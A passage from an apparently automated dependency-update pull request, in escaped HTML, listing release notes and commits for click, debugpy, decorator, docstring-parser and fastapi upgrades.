echo\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/d42f15b71757de791a5781fb179fd972da9169f5\"\u003e\u003ccode\u003ed42f15b\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eget_parameter_source()\u003c/code\u003e during type conversion and eager callbacks (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/0baa8db07736fc7ad3d3eed97d4c73b0059c63e1\"\u003e\u003ccode\u003e0baa8db\u003c/code\u003e\u003c/a\u003e Document ctx.params bypass with test and doc\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/click/compare/8.3.2...8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `debugpy` from 1.8.20 to 1.8.21\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/microsoft/debugpy/releases\"\u003edebugpy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003edebugpy v1.8.21\u003c/h2\u003e\n\u003cp\u003eFixes for:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eReturn evaluate result in DAP response body instead of writing to stdout: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrevent invalid \u003ccode\u003escopes\u003c/code\u003e request from crashing debug session: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2026\"\u003e#2026\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSkip uninitialized \u003ccode\u003e__slots__\u003c/code\u003e in variable resolver: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2024\"\u003e#2024\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eHandle \u003ccode\u003e-c\u003c/code\u003e arguments that are \u003ccode\u003ebytes\u003c/code\u003e instead of \u003ccode\u003estr\u003c/code\u003e: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix evaluation of variables from chained exception frames: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2018\"\u003e#2018\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eContinueRequest\u003c/code\u003e with a specific \u003ccode\u003ethreadId\u003c/code\u003e no longer resumes all threads (in-process adapter): \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2012\"\u003e#2012\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid strong reference to exceptions during unwind: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2008\"\u003e#2008\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eShow error message on evaluate failures in the hover context: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2006\"\u003e#2006\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDisplay \u003ccode\u003edlerror\u003c/code\u003e output when \u003ccode\u003edlopen\u003c/code\u003e fails: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2000\"\u003e#2000\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace removed \u003ccode\u003epkgutil.get_loader\u003c/code\u003e with \u003ccode\u003eimportlib.util.find_spec\u003c/code\u003e in \u003ccode\u003eget_fullname\u003c/code\u003e: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/1998\"\u003e#1998\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eEnhancements:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd option to ignore all system exit codes: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2017\"\u003e#2017\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePull changes from pydevd up to March 2026: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2010\"\u003e#2010\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eInfrastructure work:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSuppress Flawfinder false positives on Cython memcpy / read-loop iterators (TSA \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816216\"\u003e#2816216\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816217\"\u003e#2816217\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816218\"\u003e#2816218\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816219\"\u003e#2816219\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816220\"\u003e#2816220\u003c/a\u003e): \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2028\"\u003e#2028\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2029\"\u003e#2029\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2030\"\u003e#2030\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2031\"\u003e#2031\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/maxbachmann\"\u003e\u003ccode\u003e@​maxbachmann\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/mfussenegger\"\u003e\u003ccode\u003e@​mfussenegger\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/sambrightman\"\u003e\u003ccode\u003e@​sambrightman\u003c/code\u003e\u003c/a\u003e for the commits.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/858b05c08555cfc54efa7cf90e70184c7495b38e\"\u003e\u003ccode\u003e858b05c\u003c/code\u003e\u003c/a\u003e Fix TSA \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816217\"\u003e#2816217\u003c/a\u003e: suppress Flawfinder false positive on Cython JoinPyUnicode ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/f0c34f133ad3eb7992ca50e45e5459f9d58f4be8\"\u003e\u003ccode\u003ef0c34f1\u003c/code\u003e\u003c/a\u003e Fix TSA \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816216\"\u003e#2816216\u003c/a\u003e: suppress Flawfinder false positive on Cython DIGIT_PAIRS_8 ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/4c70e13d0e3fc8eee5013cd2a41c7a6d752d55d3\"\u003e\u003ccode\u003e4c70e13\u003c/code\u003e\u003c/a\u003e Fix TSA \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816218\"\u003e#2816218\u003c/a\u003e: suppress Flawfinder false positive on Cython read-loop iter...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/19c2b8c029975a6ba2e4e521d8fbdf5f1b3ed8fd\"\u003e\u003ccode\u003e19c2b8c\u003c/code\u003e\u003c/a\u003e Fix TSA \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816220\"\u003e#2816220\u003c/a\u003e: suppress Flawfinder false positive on Cython read-loop iter...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/ab9263839637357f3372ffb550395ffbf8ce9f77\"\u003e\u003ccode\u003eab92638\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2031\"\u003e#2031\u003c/a\u003e from StellaHuang95/stellahuang/tsa-2816219-flawfinde...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/12bd4fef7ea5c35248d9f175f5b0218b970fa64c\"\u003e\u003ccode\u003e12bd4fe\u003c/code\u003e\u003c/a\u003e Return evaluate result in DAP response body instead of writing to stdout (\u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2027\"\u003e#2027\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/8bd57a7d446d6ec4d7dd4e580d00cdea193ddcd9\"\u003e\u003ccode\u003e8bd57a7\u003c/code\u003e\u003c/a\u003e Prevent invalid scopes request from crashing debug session (\u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2026\"\u003e#2026\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/bf118c8d0ec97e584d2f3cfd781f04a745a1334c\"\u003e\u003ccode\u003ebf118c8\u003c/code\u003e\u003c/a\u003e Skip uninitialized \u003cstrong\u003eslots\u003c/strong\u003e in variable resolver (\u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2024\"\u003e#2024\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/a55be0e6f0700646e0833097ab78b2e4ba68745b\"\u003e\u003ccode\u003ea55be0e\u003c/code\u003e\u003c/a\u003e Potential fix when \u003ccode\u003e-c\u003c/code\u003e arguments are bytes instead of a str (\u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2021\"\u003e#2021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/0f037adec6fb2f61ad225849e953188ec349adbc\"\u003e\u003ccode\u003e0f037ad\u003c/code\u003e\u003c/a\u003e Fix evaluation of variables from chained exception frames (\u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2018\"\u003e#2018\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/microsoft/debugpy/compare/v1.8.20...v1.8.21\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `decorator` from 5.2.1 to 5.3.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micheles/decorator/blob/master/CHANGES.md\"\u003edecorator's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.3.1 (2026-05-18)\u003c/h2\u003e\n\u003cp\u003eAdded license SPDX identifier to pyproject.toml (reported by\nChristian Lackas).\u003c/p\u003e\n\u003ch2\u003e5.3.0 (2026-05-17)\u003c/h2\u003e\n\u003cp\u003eAdded official support for Python 3.14 (thanks to Hugo van Kemenade,\nDavid Cain and the GitHub user bersbersbers).\nFixed a bug with \u0026quot;return await\u0026quot; contributed by Kadir Can Ozden.\nMoved decorator.py to a package structure (\u003ccode\u003edecorator/__init__.py\u003c/code\u003e) and\nadded a stub file (\u003ccode\u003edecorator/__init__.pyi\u003c/code\u003e) contributed by Marco Gorelli.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/426e9e35d563ffe356e54bd0f970d153b8f25370\"\u003e\u003ccode\u003e426e9e3\u003c/code\u003e\u003c/a\u003e Bumped the version to 5.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/062ff0e0c33733f2148a5590d118a8570df846d5\"\u003e\u003ccode\u003e062ff0e\u003c/code\u003e\u003c/a\u003e Fixed the dependency on setuptools\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/086ff5d95d4dc550117c12647a4427d70bf8833d\"\u003e\u003ccode\u003e086ff5d\u003c/code\u003e\u003c/a\u003e Updated license\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/5807a83ead31f0de5303fa950ddea49d850d7355\"\u003e\u003ccode\u003e5807a83\u003c/code\u003e\u003c/a\u003e Updated license\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/093aced11439251e496b47a9a9369501075e8d1a\"\u003e\u003ccode\u003e093aced\u003c/code\u003e\u003c/a\u003e Updated changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/e9ced7e63ad9502b3e2a3e3db5f5f1ccc16c5fd6\"\u003e\u003ccode\u003ee9ced7e\u003c/code\u003e\u003c/a\u003e Added license SPDX\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/b3e82ddc04e8d0c18c51eecb30b4a59aee5aac1d\"\u003e\u003ccode\u003eb3e82dd\u003c/code\u003e\u003c/a\u003e Fixed CHANGES.md [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/f1ce8da8522193421436c368849afe886666b4e5\"\u003e\u003ccode\u003ef1ce8da\u003c/code\u003e\u003c/a\u003e Doc fix [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/c924d7c6aa2e47a0627706c385101ff8d558d091\"\u003e\u003ccode\u003ec924d7c\u003c/code\u003e\u003c/a\u003e Updated supported versions [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/8b83e8cca35f5c773654ce4ae89b4e3f84f430d3\"\u003e\u003ccode\u003e8b83e8c\u003c/code\u003e\u003c/a\u003e Fixed CHANGES [ci skip]\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micheles/decorator/compare/5.2.1...5.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `docstring-parser` from 0.17.0 to 0.18.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/rr-/docstring_parser/blob/master/CHANGELOG.md\"\u003edocstring-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e0.18 (2026-04-14)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eGeneral: Allow \u003ccode\u003eparse()\u003c/code\u003e to work with missing \u003ccode\u003e__doc__\u003c/code\u003e (thanks to \u003ca href=\"https://github.com/jamesbraza\"\u003e\u003ccode\u003e@​jamesbraza\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: Officially support Python 3.14 (thanks to \u003ca href=\"https://github.com/mauvilsa\"\u003e\u003ccode\u003e@​mauvilsa\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: Exclude \u003ccode\u003edocstring_parser.tests\u003c/code\u003e from built wheels (thanks to \u003ca href=\"https://github.com/gvalkov\"\u003e\u003ccode\u003e@​gvalkov\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEpydoc: Add missing attribute parsing, which includes the \u0026quot;\u003ca href=\"https://github.com/ivar\"\u003e\u003ccode\u003e@​ivar\u003c/code\u003e\u003c/a\u003e\u0026quot;, \u0026quot;\u003ca href=\"https://github.com/cvar\"\u003e\u003ccode\u003e@​cvar\u003c/code\u003e\u003c/a\u003e\u0026quot; and \u0026quot;\u003ca href=\"https://github.com/var\"\u003e\u003ccode\u003e@​var\u003c/code\u003e\u003c/a\u003e\u0026quot; syntax (thanks to \u003ca href=\"https://github.com/Masara\"\u003e\u003ccode\u003e@​Masara\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNumpydoc: Add support for defaults in type declarations and improve compose behavior (thanks to \u003ca href=\"https://github.com/jwlodek\"\u003e\u003ccode\u003e@​jwlodek\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.17 (2025-07-21)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eGeneral: Replace poetry with hatchling (thanks to \u003ca href=\"https://github.com/LecrisUT\"\u003e\u003ccode\u003e@​LecrisUT\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: Drop support for Python 3.6 and 3.7 (thanks to \u003ca href=\"https://github.com/LecrisUT\"\u003e\u003ccode\u003e@​LecrisUT\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: Officially support Python 3.13 (thanks to \u003ca href=\"https://github.com/mauvilsa\"\u003e\u003ccode\u003e@​mauvilsa\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: Publish packages to PyPI with digital attestations (thanks to \u003ca href=\"https://github.com/mauvilsa\"\u003e\u003ccode\u003e@​mauvilsa\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGoogle: Fix multi-line parameter definitions (thanks to \u003ca href=\"https://github.com/coolbeevip\"\u003e\u003ccode\u003e@​coolbeevip\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAttrdoc: Remove use of deprecated ast classes (thanks to \u003ca href=\"https://github.com/fedepell\"\u003e\u003ccode\u003e@​fedepell\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.16 (2024-03-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eParser: add a new property, \u003ccode\u003edescription\u003c/code\u003e, that combines short and long\ndescriptions into a single string (thanks to \u003ca href=\"https://github.com/pR0Ps\"\u003e\u003ccode\u003e@​pR0Ps\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: support Python 3.12 (thanks to \u003ca href=\"https://github.com/mauvilsa\"\u003e\u003ccode\u003e@​mauvilsa\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.15 (2022-09-05)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eParser: add a new function, \u003ccode\u003eparse_from_object\u003c/code\u003e, that supports scattered\ndocstrings (thanks to \u003ca href=\"https://github.com/mauvilsa\"\u003e\u003ccode\u003e@​mauvilsa\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.14.1 (2022-04-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eParser: fix autodetection (regression from 0.14)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.14 (2022-04-25)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNumpydoc: Improved support for Example / Examples section\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.13 (2021-11-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eGoogle: Added support for Example / Examples section\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.12 (2021-10-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eGeneral: Added support for lone \u003ccode\u003e:rtype:\u003c/code\u003e meta information (thanks to \u003ca href=\"https://github.com/abergou\"\u003e\u003ccode\u003e@​abergou\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.11 (2021-09-30)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eGeneral: Started tracking changes\u003c/li\u003e\n\u003cli\u003eGeneral: Added ability to combine function docstrings (thanks to \u003ca href=\"https://github.com/abergou\"\u003e\u003ccode\u003e@​abergou\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReST: Added support for \u003ccode\u003e:type:\u003c/code\u003e and \u003ccode\u003e:rtype:\u003c/code\u003e (thanks to \u003ca href=\"https://github.com/abergou\"\u003e\u003ccode\u003e@​abergou\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/87dca55a7b5bdc854ad1d190f1c461015ba5f008\"\u003e\u003ccode\u003e87dca55\u003c/code\u003e\u003c/a\u003e Bump version: 0.17.0 → 0.18.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/059d189eef68dccd226531a8536652c04e467744\"\u003e\u003ccode\u003e059d189\u003c/code\u003e\u003c/a\u003e Support Python 3.14 (\u003ca href=\"https://github.com/rr-/docstring_parser/issues/111\"\u003e#111\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/9f8501fd9cfc68794b33be79acc03a303c8bb527\"\u003e\u003ccode\u003e9f8501f\u003c/code\u003e\u003c/a\u003e Remove docstring_parser.tests from bdist (\u003ca href=\"https://github.com/rr-/docstring_parser/issues/107\"\u003e#107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/352ac5acfa7e8b91319dd26687996f856c282a97\"\u003e\u003ccode\u003e352ac5a\u003c/code\u003e\u003c/a\u003e Add support for setting default value in type declaration for numpydoc, vario...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/434078c85ef98e1bd38de0bff377e081073227da\"\u003e\u003ccode\u003e434078c\u003c/code\u003e\u003c/a\u003e build: fix builds\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/fd6fe7b35363c1744a732381596d50eda161f9e2\"\u003e\u003ccode\u003efd6fe7b\u003c/code\u003e\u003c/a\u003e epydoc: add missing attribute parsing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/37fac3d32ebd73e16c468aefd54022c6a6d8d563\"\u003e\u003ccode\u003e37fac3d\u003c/code\u003e\u003c/a\u003e docs: fix missing changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/b4a3c48883f6dd3d69c1dc57545f1b72238c6c2a\"\u003e\u003ccode\u003eb4a3c48\u003c/code\u003e\u003c/a\u003e Allowing \u003ccode\u003eparse\u003c/code\u003e to work with missing \u003ccode\u003e__doc__\u003c/code\u003e (\u003ca href=\"https://github.com/rr-/docstring_parser/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/rr-/docstring_parser/compare/0.17.0...0.18.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fastapi` from 0.135.3 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca 